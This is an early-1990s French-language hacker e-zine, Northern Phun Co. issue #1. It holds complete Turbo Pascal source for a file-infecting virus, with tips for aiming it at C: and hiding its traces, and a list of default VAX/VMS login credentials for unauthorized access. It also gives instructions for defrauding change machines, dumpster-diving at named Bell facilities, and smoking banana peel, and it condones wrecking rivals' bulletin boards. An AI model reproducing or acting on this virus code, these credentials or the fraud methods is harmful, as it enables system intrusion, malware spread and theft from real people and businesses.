P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                           Cheap drug: banadine                              C
                                                                             
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC

 
  Avertissement: Je ne suis aucunement responsable des effets causs par
  la drogue qui suit.
 
 
> Banadine (Produit de la banane)
 
  Les bananes contiennent une petite quantit de substances psychadliques.
  L'avantage de cette drogue est qu'elle est indirectement lgal, puisqu'
  elle vient de la banane. Dbutons:
 
1-  Prendre environ 1 kilogramme de pelure de banane
 
2-  Avec un couteau, peler l'intrieur de la banane.
 
3-  Mettre les restants de l'intrieur de la pelure dans un chaudron et, ajoutez-y
    de l'eau. Faites bouillir de trois (3)  quatre (4) heures. Le mlange de-
    vrait alors tre pateux.
 
4-  Etendre la pte sur un plateau  pizza, et cuire environ vingt (20) 
    trente (30) minutes au four. Le produit qui en rsultera devrait alors tre
    une poudre noire.

5-  Finalement, fmez-la. [et touffez-vous!] 3 joints de cette substances
    donnent l'effet de 1 joint de h ou de pot.


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    



                          --=GARBAGE, ANYONE?=--

                           Trashing, Bell style

                                    by
                                BLITZKREIG

Vous avez votre cagoule, votre lampe de poche, votre pince-
monseigneur, quatre ou cinq sacs verts plis dans la poche
arrire, check! Le rservoir de la voiture est plein, les copains
sont de bonne humeur: c'est le temps d'aller trasher! Oui, mais
o aller? Vous avez consult l'annuaire du tlphone, et pas une
seule petite adresse de Bell  se mettre sous la dent! NPC est
heureux de vous offrir son 1ER GUIDE DES MEILLEURES POUBELLES DE
QUBEC...

Catgorie 4 sacs: La centrale sise au 1290 du boulevard St-
Cyrille. Une des dernires visites des inspecteurs de NPC y a
rvl: des docs, du e-mail et des antiquits fort prises pour
notre mur aux trophes. Des vieux voltmtres, des casques
d'oprateur d'une autre poque, des ampremtres  pdale, bref,
quelqu'un chez Bell a dcid de vider tout le vieux stock...

Catgorie 3 sacs: La centrale de la route de l'glise,  Ste-Foy
(derrire la bibliothque municipale). Des documents, ma foi
intressants, mais un stationnement fort clair et loin de la
route, mme s'il n'y a pas de camras.

Catgorie 3 sacs: La centrale de la 1re Avenue,  Charlesbourg
(entre la 71me et la 70me). Les employs de cette centrale sont
probablement des gros bras: nous y avons trouv un banc
d'exercice lors de notre dernier passage! 

Catgorie 2 sacs: Le 1150 Chemin St-Louis... Peut-tre serez vous
plus chanceux que nous...

Catgorie 1 sac: De mmoire d'homme, nul n'a jamais vu un bac 
ordures au 504 Lavigueur. Non seulement l'endroit est
littralement TRUFF de camras, mais il n'y a strictement pas
de poubelles! Ce qui nous fait dire que les employs de la place
doivent tre malheureux si on les oblige  bouffer leurs ordures!

Catgorie 1 sac: Le 930 d'Aiguillon (Carr d'Youville) est du
mme calibre. Camras et absence d'ordures. Les gens sont si
mfiants...

Tome 2 des meilleures poubelles de la vieille capitale dans le
prochain numro...   


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    
  

NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
                                                                             
N                         Ralis par: Coaxial Karma                          N
P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                   Fourvoyer l'oeil d'une machine  monnaie                  C
                                                                             
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC

   N'avez-vous jamais vu une de ces grosses machines  monnaie dans les aro-
   ports et centre commerciaux, qui, lorsque vous dposez 2 ou 5 dollars, vous
   redonne de la monnaie en change ? Le fichier prsent vous aidera  les
   fourvoyer.
  
   En voici les tapes:

   1- Trouver une machine.

   2- Aprs avoir trouvr la machine en question, prenez un billet de 2 ou 5
   dollars. Donnez-lui la forme d'une boule. Ensuite, redonnez-lui sa forme
   plate. La surface du billet devrait alors tre ondule.

   3- Maintenant, le processus va se compliquer. Vous devez faire une dchirure
   sur le ct gauche du billet a environ 1/2 pouce en-dessous du chiffre 5.

   4- Maintenant, insrez le billet dans la machine. Lorsque vous insrez le
      billet dans la machine, elle croit que tout est fonctionnel, et, au
      mme moment, vous renvoie la monnaie. Mais, lorsqu'elle arrive  la
      partie dchire du billet, la machine constate la dchirure, et vous
      redonne le billet.
 
                  Ŀ
                   BANK OF CANADA                 
                   (5)         /-\      (5) 
                                                
                                                
                   (5)  /\     \/      (5) 
                                                
                  -/  \

                          \-------Faire une dchirure ici.
                                  Environ 1/2 pouce en-dessous
                                  du chiffre 5.


P.S. Si ce fichier vous rapporte au dessus de 250$ par semaine, envoyer nous
     un lger pourcentage de 50%



      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    


{Northern Phun Co. Inc.  }
{NewsLetter #1 Phile #?  }
{Information gathered by }
{The Subhuman Punisher   }


                              -=Hacking VAX/VMS=-
                          -=Part One: Getting Into=-

              (* THIS FILE IS FOR INFORMATIONAL PURPOSES ONLY *)


iNTRO :  If you are a beginner at hacking or you are totally lacking 
         ability, VAX/VMS is not the type of system to start on. Try 
         UNIX, there are numerous text philes on it and they are 
         rather easy to get into.

         Okay, you just logged into a VAX/VMS, which I will now use 
         the VAX systems or the VMS system interchangeable for 
         simplicity sake, as you've heard that you can get easily an 
         unused account which the lazy system operator haven't 
         deleted. VAX are usually linked with a front-end system 
         like UNIX or DecServer.

         After successful connection is established, you will see 
         something like this:

         VAX/VMS V5.3-1 Universite Laval (CRSNG)

         Here starts the phun part. After entering a username it 
         will prompt you for a password, no matter if the username 
         is OK or not. The password will not be echoed as you type. 
         You will normally see a system message upon successfully 
         logging in. The dollar sign ($) is the default prompt. And 
         you will also be prompted with how many e-mails you have, 
         etc.

         VAX/VMS have the following default accounts which you can 
         use to log in if the system manager didn't take the time to 
         configure his system safely (for him <g>):

                          ͻ
                           Username     Password 
                          Ķ
                           SYSTEM       MANAGER  
                           SYSTEM       OPERATOR 
                           FIELD        SERVICE  
                           FIELD        TEST     
                           DEFAULT      DEFAULT  
                           DEFAUT       USER     
                           SYSTEST      UETP     
                           SYSTEST      SYSTEST  
                           DECNET       DECNET   
                           DECNET       NONPRIV  
                           VAX          VAX      
                           VMS          VMS      
                           DCL          DCL      
                           DEC          DEC      
                           DEMO         DEMO     
                           TEST         TEST     
                           NETNONPRIV   NONPRIV  
                           NETPRIV      PRIV     
                           ORACLE       ORACLE   
                           ALLIN1       ALLIN1   
                           INGRES       INGRES   
                           GUEST        GUEST    
                           GAMES        GAMES    
                           BACKUP       BACKUP   
                           HOST         HOST     
                           USER         USER     
                           DIGITAL      DIGITAL  
                           REMOTE       REMOTE   
                           SAS          SAS      
                           FAULT        FAULT    
                           USERP        USERP    
                           VISITOR      VISITOR  
                           GEAC         GEAC     
                           VLSI         VLSI     
                           INFO         INFO     
                           POSTMASTER   MAIL     
                           NET          NET      
                           LIBRARY      LIBRARY  
                           OPERATOR     OPERATOR 
                           OPER         OPER     
                          ͼ

Please note that many of the above are interchangeable, use your hacker mind to
"GETDAFUCKINTODERE". Now that you are in, there are many commands available to
you; I will review them in a future release of NPC [live long and prosper]!



------
VAX :  Virtual Access eXtension
VMS :  Virtual Memory System
------

CopyLeft (c) 1992 by The Subhuman Punisher & Northern Phun Co.



      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    




NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
                                                                             
N                         Ralis par: Coaxial Karma                          N
P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                  Fourvoyer l'oeil d'une machine a monnaie II                C
                                                                             
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC

    N'avez-vous jamais t  court de pices de 25 lorsque vous jouez 
    l'arcade ? Le fichier prsent vous aidera a rsoudre ce probleme.


    Matriel:

        - Plaque d'aluminium

    Marche  suivre:

        - Trouver une machine  monnaie

        - Vous devez tailler la plaque d'aluminium  la dimension d'un billet.
          Ensuite, mettez celle-ci dans la machine, le ct brillant doit tre
          orient vers le haut. Le rle de la machine est de verifier si le
          rayon lumineux envoy est rflchi, si c'est le cas, elle vous
          envoie la monnaie.



      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    



                      DR FRANKENSTEIN, WHERE ARE YOU?
                       Turbo Pascal et les bibittes

                         --=Virus pour dbutant=--
                               Virus NPC-011

                                    par
                                Blitzkreig
                                     &
                               Nancy Reagan
                                     
     Vous en bavez, n'est-ce pas, les mecs? Vous regardez les
virus files de L.O.S. ou Cybernetic Violence et vous demandez
quel gnie peut bien concevoir toutes ces choses magnifiques...
Sachez que n'importe qui peut crire un virus, n'importe qui
n'ayant pas peur de TRAVAILLER, s'entend. Si tu es le dernier de
ta classe en maths ou si la dernire fois que tu as lu un manuel
les dinosaures taient encore en voie d'extinction, passe ton
chemin, stranger. T'as probablement pas assez de couilles et de
volont pour t'appliquer  ne pas faire de btises et tu vas te
ridiculiser avec ton virus plein de bugs (s'il fonctionne
jamais!). Pas de recette miracle pour les paresseux, mme avec
Virus Creator Lab et ses semblables: que du travail, du travail
et du travail. Commence par le langage, le reste viendra tout
seul. Turbo Pascal, anyone?

     Avant de vous montrer comment effacer un FAT, loader un
trojan dans un GIF porno autoexec, ou la manire la plus efficace
de crasher ton board warez favori, on pourrait d'abord scruter
un virus fort simple, soulever le capot de la bte et analyser
le mcanisme. Here it goes...

PRCAUTIONS A PRENDRE: AUCUNES!

Nous allons, tape par tape, construire un virus en Turbo Pascal
( version 3.0 et plus), mais un virus sans danger, pour que vous
puissiez le tester sur votre machine. Nous le rptons:
l'excution de ce virus est absolument sans risque. La
propagation ne touchera pas les fichiers .EXE ou .BAT, uniquement
les .COM... Mieux encore, le virus, lorsqu'il s'attaquera  un
.COM, en fera une copie non-infecte, que vous pourrez rcuprer
plus tard. Et comme si ce n'tait pas assez, une autre mesure de
scurit a t prise: le virus ne pourra lire que le drive A de
votre systme. Autrement dit, faites-vous une disquette avec 4
ou 5 .COM, mettez-la dans le drive A, et regardez comment le
virus ragit.

CATGORIE DU VIRUS: LOGIQUE!

Comme si nous ne l'avions pas assez dit (vous comprenez vite,
mais il faut vous expliquer longtemps!), ce programme ne contient
aucune tche de manipulation, il se contentera de manifester sa
prsence par le message "NPC made in Qubec".

Le programme qui suit vous permettra de construire un virus
"logique", qui simulera le comportement d'un virus sans
rcriture, et en lanant l'excution, lorsque cela sera possible
(nous verrons les conditions plus tard), du programme original
depuis la copie du virus. Le programme va tenter d'infecter TOUS
les .COM en A, et affichera "La job est faite, chef!" lorsque
tous les .COM seront infects.
Pourquoi juste les .COM? Parce que ce type de programme a une
structure identique en mmoire et sur le disque, et parce que la
version 3.0 de Turbo Pascal permet de gnrer des fichiers .COM,
et c'est justement ainsi que vous devriez appeller votre virus
une fois assembl: VIRUS.COM.

PRINCIPES GNRAUX DU VIRUS NPC-011

-    Sauvegarde du contenu de la constante "nomprog" dans la
     variable "b".

-    Recherche sur le disque A du premier fichier .COM ne
     contenant pas la marque "NPC made in Qubec".

-    Le programme que va infecter le virus sera sauv et renomm
     en   remplaant le premier caractre de son nom par le
     symbole "$". 
-    Le nom du programme renomm sera crit en mmoire vive 
     l'emplacement absolu de la constante "nomprog",
     pralablement  sauvegarde.

-    Cration d'un nouveau fichier du nom du programme 
     infecter.

-    Recopiage du programme en mmoire vive dans le fichier cr.

-    Excution du programme dont le nom figure dans la variable
     "b"  (on va aussi voir  tout--l'heure) A CONDITION que
     le   fichier existe sur le disque ET que ce programme ait
     t  gnr par Turbo Pascal 3.0 (ou la version que vous
     utilisez).

Vous nous suivez jusqu'ici? C'est bien! Sinon, les choses vont
s'claircir au fur et  mesure que nous avancerons. Le programme
NPC-011 repose sur deux principes gnraux: 

1) La dclaration d'un tableau d'octets "deb" situ  l'adresse
absolue: CSEG:$100. Cette adresse correspond au dbut du code de
programme en mmoire (CSEG contient l'adresse du segment de code
et tous les programmes .COM dbutent  l'adresse offset $100).
Ainsi le tableau "deb" est identique au code du virus en mmoire,
il suffit de recopier ce tableau sur un programme pour recopier
le code du virus.

2) On crit directement en mmoire   l'adresse
"CSEG:OFS(nomprog) + 1", le nom renomm du programme en cours de
manipulation. A quoi ca sert, me demandez-vous: tenez-vous bien!
Lorsque le programme du virus sera lanc, et aprs qu'il ait
accompli sa "manipulation", il enchanera sur l'excution du
programme dont le nom figure dans la variable "b", simulant ainsi
un fonctionnement impeccable!

ENCORE QUELQUES MOTS

Le listing qui suit pourrait sembler, aux yeux des nophytes, un
contresens: on programme les commandes d'infection du virus avant
les commandes qui lui disent de chercher une victime. C'est tout
 fait normal: il faut "mettre le virus au monde", et lui
indiquer au cours de sa cration ce qu'est exactement sa mission
dans la vie. Une fois qu'il sait ce qu'il doit accomplir, l, tu
lui dit: va te trouver une victime et amuse-toi! Ca a l'air
simple, comme ca, mais c'est le bout qui demande parfois le plus
de subtilit, car la programmation exige bien souvent de procder
A L'ENVERS de ce qui, autrement, nous semblerait logique. Pour
les durs de comprenure, illustrons ce qui prcde: Supposons que
tu engages un tueur  gages, justement, pour liminer ton
professeur de chimie. Tu vas probablement lui dire "Entre dans
l'cole, entre dans la classe, et descend le professeur de
chimie, ensuite ressort". Si, par contre, tu "programmais" un
tueur  gages, il faudrait plutt que tu lui dises: "Ta mission
est de tuer le professeur de chimie, tu dois pour ce faire
utiliser ce pistolet, voici comment il fonctionne. Maintenant,
entre dans l'cole, entre dans la classe, et remplis la mission
pour laquelle je t'ai programm". C'est du moins la manire dont
nous procdons, Nancy Reagan et moi-mme. Enfin... C'est un peu
succint comme explication mais j'espre que vous avez tous
compris (ou alors retournez lire vos Tintins...). Naturellement,
la programmation d'un virus est gnralement encore plus
sophistique que cel, ce qui me ramne  mon premier argument:
tudier, tudier, tudier...

C'est maintenant la passe la plus plate (pour nous) de cet
article: le listing du programme. Mais y faut c'qui faut!!



LISTING DU PROGRAMME


PROGRAM virus;

TYPE      chaine = STRING[15];

CONST
          n = 13002; {longueur du virus compil}

     nomprog : STRING[15] = "

";

     marque : STRING[31] = "NPC made in Qubec";

VAR       deb : ARRAY [0..15000] OF BYTE ABSOLUTE

CSEG:$100;

        b : chaine;

      fic : FILE;

        i : INTEGER;

signature : STRING[24];

PROCEDURE fin;  

{En gros, toute cette procdure excute le programme $..}

VAR a: STRING[24];

BEGIN{fin}

     CLRSCR;

     {$1-} {Supprime le contrle des entres/sorties}

     ASSIGN(fic,b);

     RESET(fic,1);

     IF IORESULT=0 {Si il n'y a pas d'erreurs d'entres/sorties}

     THEN

     BEGIN

        BLOCKREAD(fic,deb,44);

        a := "";

        FOR i:=21 TO 44 DO

          a:= a + CHR(deb[i]);

{Ce qui veut dire que si le programme $.. est un programme Turbo
Pascal 3.0, l'excuter}

       IF a = signature THEN EXECUTE(fic)

     END;

     HALT{interruption du programme}

END; {fin}

PROCEDURE infecte(a:chaine);

(Cette procdure cre le nouveau programme de virus}

VAR

     ficmanip : FILE;

            i : INTEGER;

BEGIN{Ce programme lance l'infection, le bout que vous attendiez
tous!}

{Maintenant, le nom du programme en cours d'infection est recopi
dans le programme de virus avec le caractre "$"}

FOR i := LENGTH(a)+1 TO 15 DO

   a := a + " ";
 
FOR i :=1 TO 15 DO

     MEM[CSEG:OFS(nomprog)+i] := ORD(COPY(a,i,1));

     MEM[CSEG:OFS(nomprog)+4] := ORD("$");

{Le tableau deb est copi sous le nom du fichier manipul}

     ASSIGN(ficmanip,a);

     REWRITE(ficmanip);

     RESET(ficmanip,1);  {Ouverture du programme  infecter. Y!}

     BLOCKWRITE(ficmanip,deb,n);  {Ecriture dans le fichier}

     CLOSE(ficmanip); {Fermeture du fichier manipul}

     fin

{5 petites lignes de commandes, et le tour est jou! Mais ne vous
rjouissez pas trop vite, on a pas termin!}

END; {Infecte!}

PROCEDURE recherche;

{Cette procdure recherche les fichiers COM sur l'unit A}

TYPE

   dtarec = RECORD

     tab : ARRAY[1..21] OF BYTE;

     attribut : BYTE;

     heure,date,taillehaute,taillebasse : INTEGER;

     nom : ARRAY[1..13] OF CHAR

  END;

registres = RECORD

  CASE BYTE OF

  1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : INTEGER);

  2 : (AL,AH,BL,BH,CL,CH,DL,DH          : BYTE)

END;

VAR

          dta : dtarec;

       chemin : STRING[20];

   longchemin : BYTE ABSOLUTE chemin;

        regis : registres;

            i : BYTE;

PROCEDURE renomme;

{Cette procdure vrifie que le fichier slectionn (la victime)
n'est pas dj infect et renomme le fichier  manipuler en
remplacant le premier caractre du nom du programme par un "$"}

VAR

 nom,nouvnom : chaine;

         fic : FILE;

         i,k : INTEGER;

           a : STRING[32];

           b : BOOLEAN;

BEGIN{renomme}

     b := TRUE;

     chemin := dta.nom;

     i := POS(*0,chemin);

     IF i >0 THEN DELETE(chemin,i,255);

     nom := "A:\" + chemin;

     IF (COPY(nom,4,1) <> "$")

     THEN

     BEGIN

       ASSIGN(fic,nom);

       RESET(fic,1);

       k := OFS(marque);

{Au cas ou le programme aurait une taille plus grande ou gale
 celle du virus}

       IF FILESIZE(fic) >= n

     THEN

     BEGIN

{Lecture de la zone de marque du virus, pour voir si le programme
est infect}

     BLOCKREAD(fic,deb,k+31);

     a := "";

     FOR i := 1 TO 31 DO

     a := a + CHR(MEM[CSEG:k+i]);

     IF a = marque THEN b:= FALSE

END;

IF b THEN {Si le fichier n'est pas infect}

     BEGIN

     {Renommer le fichier  manipuler}

     nouvnom := "A:\$"+COPY(nom,5,length(nom)-4);

     RENAME(fic,nouvnom);

     infecte(nom) {Appel de la routine d'infection. Y!}

     END

  END

END; {renomme}

BEGIN {recherche}

{Initialisation de l'adresse de la DTA}

regis.AH := $1A;

regis.DS := SEG(dta);

regis.DX := OFS(dta);

MSDOS(regis);

{Recherche du premier fichier .COM du disque A}

chemin := "A:\*.COM";

chemin[SUCC(longchemin)]:=*0;

regis.AH := $4E;

regis.DS := SEG(chemin);

regis.DX := OFS[chemin(1)];

regis.CX := $FF;

MSDOS(regis);

IF regis.AX <> $12 {S'il existe un fichier .COM sur A:}

THEN

REPEAT

   renomme;

{On recherche le fichier .COM suivant pour l'infecter...}

regis.AH := $4F;

regis.DS := SEG(dta);

regis.DX := OFS(dta);

MSDOS(regis);

UNTIL regis.AX = $12 {jusqu' ce qu'ils portent tous la signature
du virus}

END; {recherche}

BEGIN {virus}

   CLRSCR;

   GOTOXY(25,12);

   WRITELN(marque);

   {C'est le copywrite de Turbo Pascal 3.0, rendons  Csar ce
qui appartient  Csar...}

   signature := *49+*57+*56+*53+*32+*66+*79+*82+*76+*65+*78+*68+
*32+*73+*110+*99+*2+*4+*0+*177+*87+*0+*60+*51;

{Le nom du programme est lu en mmoire pour pouvoir tre excut
 la fin de la procdure}

b:='';

FOR i := OFS(nomprog)+1 TO OFS(nomprog) +15 DO

b:=b+(CHR(MEM[CSEG:i]));

recherche;

CLRSCR;

GOTOXY(20,12);

WRITELN("La job est faite chef!");

GOTOXY(20,13);

WRITELN("Ton repertoire A est lessive mon mec!");

REPEAT UNTIL KEYPRESSED; {Le texte va apparaitre aussi longtemps
que tu n'auras pas press une cl}

fin

END. {Et voil l'travail!}


Ne continuez plus  crire, l, c'est termin! Bon, laissez-nous
souffler un peu. C'est vraiment assommant de taper tout ca...

PORTRAIT DES ACTIVITS

Ce que vous devriez normalement voir, si vous faites un dir de
A  chaque tape, c'est  peu prs ceci (exemple):

1) AVANT L'EXCUTION DE VIRUS.COM

A:

APPEND    COM  1742 K
README    COM   543 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

2) APR S L'EXCUTION DE VIRUS.COM SUR LE PREMIER FICHIER TROUV

A:

$PPEND    COM  1742 K
README    COM   543 K
APPEND    COM 13002 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

(Remarquez que le append.com est pass de 1742 octets  13002
octets. Pourquoi, selon vous? Parce que le virus s'y cache et
augmente sa masse, voyons!. Le fichier original append.com est
toujours l, seulement, il s'appelle $append.com maintenant. Mais
il est intact, rassurez-vous!)

3) APR S L'EXCUTION DU PREMIER PROGRAMME CONTAMIN

A:

$PPEND    COM  1742 K
$EADME    COM   543 K
APPEND    COM 13002 K
README    COM 13002 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

(Le virus a excut append.com, et part maintenant  la chasse
aprs un autre .COM. Si un programme .COM tait crit en Turbo
Pascal, nous l'avons dit, le virus l'excuterait, et si le
programme avait une fonction visible (ex: un crack TSR), vous le
verriez agir  l'cran -le crack s'installerait- )


NOTES DIVERSES

Nous esprons que vous avez compris quelque chose  ce petit
cours de "virusologie" en acclr. Vous tes loin d'tre sortis
du bois, cependant! Mais, pour les plus observateurs d'entre
vous, vous avez surement not quelques endroits, ici et l dans
cette routine, qui, une fois lgrement modifies, pourraient
rendre ce virus autrement plus dangereux... Il y a effectivement
des amliorations, ma foi fort simples, qui pourraient tre
apportes, et pour n'en citer que quelques unes:

-changer le drive de travail du programme de A  C (vous tes
capables de trouver ca seul!).

-Sauvegarder les dates et heures de cration des programmes
originaux, puis les restituer dans le programme modifi par le
virus (mais o placer la routine? Guess!).

D'autres suggestions? Laissez-nous un message!
 


NPC-011: VIRUS FOR THE MASSES!


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    



                             L'tat des choses
                                    ou

                     LA SCENE DE QUBEC: QUELLE SCENE?

                                    par
                                 THX 1138
                         and the rest of the posse

La scne? Quelle scne? Ah! Vous voulez parler de ces babillards
"pirates" o on discute de hockey et de rfrendum? Atreid
Bevatron vous a dit tout  l'heure tout le mal qu'il pensait de
ce genre de conversation dans le contexte, et je suis
naturellement de son avis. Que vous ttiez aprs des 0-30 warez
(qui sont en ralit des 90-150!), passe encore: nous savons
qu'un jour ou l'autre, l'appel du pirate sera le plus fort et que
vous allez devenir SRIEUX dans vos hobbies, les mecs. Remarquez,
je comprends que vous tentez de gonfler vos ratios avec des
conversations anodines, mais, faut-il le souligner, un tel
comportement de la part de gens qui enfreignent SCIEMMENT la loi
nous laisse perplexe. Vous savez que vous enfreignez la loi avec
vos warez pirats, n'est-ce pas? Alors, tant qu' risquer de vous
faire pincer, arrangez-vous pour que a en vaille la peine!
Imaginez le juge qui vous condamne  2500 dollars d'amende pour
avoir upload la copie beta de DOS 6.0 et pour avoir fait des
postings sur les Nordiques dans un bab illicite! Si a se sait,
vous allez faire rire de vous! Remarquez, vous ne portez pas tout
le blme: c'est le systme actuel de ratios qui vous force la
main et qui vous pousse  crire tous ces messages ridicules. Et
je vais vous pargner toutes nos rflexions  propos de la
qualit du franais...

Si on veut tracer un portrait fidle du milieu, et au risque de
choquer certains sysops (mme si ceux-ci devraient, comme nous
tous d'ailleurs, pouvoir regarder la vrit en face), c'est que
la partie pirate (c.a.d. warez) de QUBEC est domine pour le
moment par The Joker's Den et Eldar's Craftworld. Tous les autres
babs,  ma connaissance, se nourrissent des miettes qui tombent
sous la table... Et pour cause, ces deux babs pratiquent des
ou tarifs exorbitants ou des ratios impossibles  respecter si on
ne fait pas de L.D. aux States.  Le sysop de Eldar's est de plus
TRES strict, c'est le moins qu'on puisse dire. On pourrait
rsumer l'attitude de Slum Dweller en une phrase: une main de fer
dans un gant de... bton! Ce dernier fonctionne avec des ratios
car, fouille-mo, il considre le fait d'exiger des sous comme
immoral... En ce qui concerne The Joker, que dire sauf que...
Ecoutez, je vais tenter de vous illustrer le fond de ma pense par
cet exemple: The Joker (qui est un brave type,  sa faon) s'est
fait formater ses H.D. rcemment. Pour autant que nous le sachions,
il souponne encore les types d'Eldar's d'avoir perptr ce
forfait. Et pourquoi souponne-t'il Eldar's? Parce que The Joker
avait lui-mme fait un post dans son board, quelques jours
auparavant, o il lanait des attaques du genre:
MEGA-FUCKING TO THE BOYS OF ELDAR'S. WE'LL KILL EVERYONE OF YOU,
BOYS, DON'T YOU WORRY! C'est le genre de comportement qui demande
une rplique, me direz-vous. Je vous l'accorde, mais... Slum
Dweller et ses copains n'ont rien  voir dans cette attaque.
Faites-moi confiance, le coup est parti d'ailleurs (Woah! On se
croirait dans J.F.K., avec l'histoire du deuxime tireur!). La
personne qui l'a format m'a racont que la personnalit du sysop
ne lui revenait pas, tout simplement. Et, ce qui n'a pas aid,
il m'a aussi dit que son co-sysop puait de la gueule. Bien que,
personnellement, The Joker ne m'aie jamais apparu comme quelqu'un
d'antipathique (bien au contraire, il mrite  tre connu), je
me range de cet avis en ce qui concerne The Genius, alias Dexxa,
alias Cobra (H! C'est pas une attaque personnelle, mon mec! Je
n'ai mme pas donn ton vrai nom, ni ton numro de tlphone et
tout le bazar! C'est seulement que ta personnalit lectronique
laisse  dsirer...). Pour sa dfense, sachez que The Genius est
probablement un des runners les plus efficaces de la rgion de
QUBEC. Le type fait des L.D. comme certains respirent! Le nombre
de megs qu'il uploade  chaque semaine chez Joker's Den est
suprieur  son quotient intellectuel! Un excellent runner, donc,
mais cette qualit est bien souvent ombrage par son caractre.
Sa route est littralement parseme de cadavres (au figur...
jusqu' maintenant, du moins). Le nombre de babilleurs que ce mec
a cross vous laisserait pantois! A ce que je sache, il est, 
ce jour, barr de chez Dark World, Bad Land et Venom. D'autres
babillards suivront srement... 'Nuff said! Si vous le croisez,
changez de trottoir.  
Un dernier mot sur les megas-babs de Qubec: il semblerait que
T.D.T. aie deux nodes  Qubec. Contactez-nous, les mecs! On veut
vous connaitre!
On vient de parler d'un bab  (majeur) qui vient de se faire
planter mais, dans le fond, on dirait que les babs tombent comme
des mouches ces jours-ci. Venom et Dark World sont passs au cash
Et je vous parle mme pas de l'abruti qui a menac de rapporter
Xenophobic Tendancies (change ce nom, mec, il me fait grincer des
dents!)  la GRC. Nous ne donnerons pas son nom ici, un) parce
que la rubrique "rglements de compte" n'est pas encore dmarre,
et parce que deux) son nom est post dans  peu prs tous les
babs. Mais notre position est celle-ci: vous pouvez toujours vous
chicaner pour savoir qui a le plus gros modem, vous pouvez
toujours vous crper le chignon parce-que-mon-pre-est-plus-fort-
que-le-tien, mais, de grce, laissez les flics hors de a! La
GRC, c'est comme le SIDA, les mecs: tu ne raconterais pas  la
minette que tu veux lever que tu es infect, mme en farce, de
peur qu'elle ne trouve pas la plaisanterie de bon got, ou pire,
de peur qu'elle te croie... Un bab, c'est comme une  minette, les
mecs, faut pas lui faire peur avec des GROS microbes. Si vous
aimez pas quelqu'un, stie, plantez son bab, cassez-lui les
jambes, je sais pas, envoyez-lui votre belle-mre, mais, s'il-
vous-plat, gardez a en famille et ne mlez pas les flics l-
dedans... ou alors, c'est que nous avons affaire  un idiot
congnital, qui va devoir dsormais regarder des deux cts de
la rue avant de traverser, de peur qu'un camion se cache derrire
la borne fontaine...

Le mois prochain: les boards underground (files), les cartes
d'appel, un INJECTOR pour les virus, et plein de petites
gteries. Watch out for NPC-II!!! D'ici l, on va se faire
violence et accepter vos commentaires... Non, srieusement, vous
tes bien videmment invits  nous contacter, pour nous poser
des questions techniques sur tout ce qui concerne l'underground
(car  compter du mois prochain, nous animerons un forum des
lecteurs), nous soumettre votre candidature si vous tes
intresss  devenir des collaborateurs de NPC, ou, mieux encore,
nous proposer une chronique ou un article pour le prochain numro
de Northern Phun Co. - The magazine.

Pour nous rejoindre, rien de plus facile! En tout premier lieu,
il y a MEDIC BBS (oui! UN BAB SHAREWARE!): le sysop le plus cool
de ce ct-ci du Rio Grande s'est gracieusement offert  nous
offrir une bote aux lettres. Get this, boys and girls, vous
pouvez nous laisser des messages anonymes, sans que vous puissiez
tre retras de quelque manire que ce soit. Voici comment a
va fonctionner, les touts p'tits: lorsque vous obtenez un login
chez Medic, tapez tout simplement GUEST, et le mot de passe
(GUEST), pour avoir accs  une section spciale de la messagerie
rserve  NPC. Attention! Le reste du babillard vous sera
interdit! Vous devrez reloguer, sous votre nom rgulier cette
fois, si vous dsirez continuer vos prgrinations dans ce que
nous considrons tous,  l'unanimit, comme le board public le
plus complet et le plus professionnel que Qubec ait jamais
acceuilli. Laissez le message  ce nom (NPC), anonyme si vous le
dsirez (pour les grands timides...) ou avec votre handle
rgulier. Ne vous inquitez pas, on va vous retrouver!
Naturellement, si vous dsirez nous laisser des informations
supplmentaires, ce sera beaucoup plus facile (on n'aura pas 
soudoyer votre concierge!).
Il y a aussi le dernier, mais non le moindre, Land of Silence
(comme vous le voyez, on ne s'associe vraiment qu'avec les
meilleurs!) qui constitue en somme notre home away from home...
Pour ceux qui croient qu'un mec comme Coaxial est vraiment tomb
